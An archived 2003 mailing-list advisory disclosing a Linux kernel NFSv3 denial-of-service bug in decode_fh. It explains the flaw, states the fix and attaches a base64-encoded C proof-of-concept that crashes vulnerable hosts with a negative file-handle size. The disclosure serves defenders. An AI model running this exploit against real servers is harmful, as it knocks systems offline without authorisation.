The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Remote Linux Kernel < 2.4.21 DoS in XDR routine.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 29 Jul 2003 12:55:34 -0700 (PDT)
From: Jared Stanbrough <[email protected]>
To: [email protected]
Subject: Remote Linux Kernel < 2.4.21 DoS in XDR routine.

---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <[email protected]>


Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
}

Where p is a packet of attacker controlled XDR data. If size is made to be
negative, the sanity check is passed and the malicious value is passed to
memcpy. Due to the behavior of the kernel's memcpy, this will cause a very
large copy in kernel space, resulting in an instant kernel panic.

The attached code is a POC of this vulnerability. It requires that the
vulnerable host has an exported directory available to the attacker. This
is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <[email protected]>

---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="knfsd_dos.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="knfsd_dos.c"

LyoNCiAgTGludXggMi40Lngga25mc2Qga2VybmVsIHNpZ25lZC91bnNpZ25l
ZCBkZWNvZGVfZmggRG9TDQogIEF1dGhvcjogamFyZWQgc3RhbmJyb3VnaCA8
amFyZWRzQHBkeC5lZHU+IA0KICBEYXRlOiAwNy8xOS8yMDAzDQogIA0KICBW
dWxuZXJhYmxlIGNvZGU6IChmcy9uZnNkL25mczN4ZHIuYyBsaW5lIDUyLTY0
KQ0KDQogIHN0YXRpYyBpbmxpbmUgdTMyICoNCiAgZGVjb2RlX2ZoKHUzMiAq
cCwgc3RydWN0IHN2Y19maCAqZmhwKQ0KICB7DQogICAgICAgIGludCBzaXpl
Ow0KICAgICAgICBmaF9pbml0KGZocCwgTkZTM19GSFNJWkUpOw0KICAgICAg
ICBzaXplID0gbnRvaGwoKnArKyk7DQogICAgICAgIGlmIChzaXplID4gTkZT
M19GSFNJWkUpDQogICAgICAgICAgICAgICAgcmV0dXJuIE5VTEw7ICAgDQoN
CiAgICAgICAgbWVtY3B5KCZmaHAtPmZoX2hhbmRsZS5maF9iYXNlLCBwLCBz
aXplKTsNCiAgICAgICAgZmhwLT5maF9oYW5kbGUuZmhfc2l6ZSA9IHNpemU7
DQogICAgICAgIHJldHVybiBwICsgWERSX1FVQURMRU4oc2l6ZSk7DQogIH0N
Cg0KICBUaGlzIGNvZGUgaXMgY2FsbGVkIGJ5IHF1aXRlIGEgZmV3IFhEUiBk
ZWNvZGluZyByb3V0aW5lcy4gVGhlIGJlbG93DQogIFBPQyBkZW1vbnN0cmF0
ZXMgdGhlIHZ1bG5lcmFiaWxpdHkgYnkgZW5jb2RpbmcgYSBtYWxpY2lvdXMg
ZmhzaXplDQogIGF0IHRoZSBiZWdpbm5pbmcgb2YgYSBkaXJvcGFyZyB4ZHIg
YXJndW1lbnQuIA0KIA0KICBUbyB0ZXN0IHRoaXMsIHRoZSB2dWxuZXJhYmxl
IGhvc3QgbXVzdCBoYXZlIGFuIGFjY2Vzc2libGUgZXhwb3J0ZWQNCiAgZGly
ZWN0b3J5IHdoaWNoIHdhcyBwcmV2aW91c2x5IG1vdW50ZWQgYnkgdGhlIGF0
dGFja2VyLiBfSE9XRVZFUl8gDQogIGl0IG1heSBiZSBwb3NzaWJsZSB0byB0
cmlnZ2VyIHRoaXMgYnVnIGJ5IHNvbWUgb3RoZXIgbWV0aG9kLg0KDQogIEZp
eDogU2ltcGx5IGNoYW5nZSBzaXplIHRvIGFuIHVuc2lnbmVkIGludCwgb3Ig
Y2hlY2sgZm9yIHNpemUgPCAwLg0KKi8NCg0KI2luY2x1ZGUgPHJwY3N2Yy9u
ZnNfcHJvdC5oPg0KI2luY2x1ZGUgPHJwYy9ycGMuaD4NCiNpbmNsdWRlIDxy
cGMveGRyLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUg
PHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KI2Rl
ZmluZSBORlNQUk9HIDEwMDAwMw0KI2RlZmluZSBORlNWRVJTIDMNCiNkZWZp
bmUgTkZTUFJPQ19HRVRBVFRSIDENCg0Kc3RhdGljIHN0cnVjdCBkaXJvcGFy
Z3MgaGVoOw0KDQpib29sX3QgeGRyX2hlaChYRFIgKnhkcnMsIGRpcm9wYXJn
cyAqaGVoKSANCnsNCiAgaW50MzJfdCB3ZXJkID0gLTE7IA0KICByZXR1cm4g
eGRyX2ludDMyX3QoeGRycywgJndlcmQpOw0KfQ0KDQppbnQgbWFpbih2b2lk
KQ0Kew0KICBDTElFTlQgKiBjbGllbnQ7DQogIHN0cnVjdCB0aW1ldmFsIHR2
Ow0KDQogIGNsaWVudCA9IGNsbnRfY3JlYXRlKCJtYXJkdWsiLCBORlNQUk9H
LCBORlNWRVJTLCAidWRwIik7DQogIA0KICBpZihjbGllbnQgPT0gTlVMTCkg
ew0KICAgICAgcGVycm9yKCJjbG50X2NyZWF0ZVxuIik7DQogIH0NCg0KICB0
di50dl9zZWMgPSAzOw0KICB0di50dl91c2VjID0gMDsNCiAgY2xpZW50LT5j
bF9hdXRoID0gYXV0aHVuaXhfY3JlYXRlX2RlZmF1bHQoKTsNCg0KICBjbG50
X2NhbGwoY2xpZW50LCBORlNQUk9DX0dFVEFUVFIsICh4ZHJwcm9jX3QpIHhk
cl9oZWgsIChjaGFyICopJmhlaCwNCiAgICAgICAgICAgICh4ZHJwcm9jX3Qp
IHhkcl92b2lkLCBOVUxMLCB0dik7DQoNCiAgcmV0dXJuIDA7DQp9DQogIA0K
IA0K
---559023410-758783491-1059444170=:12158--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру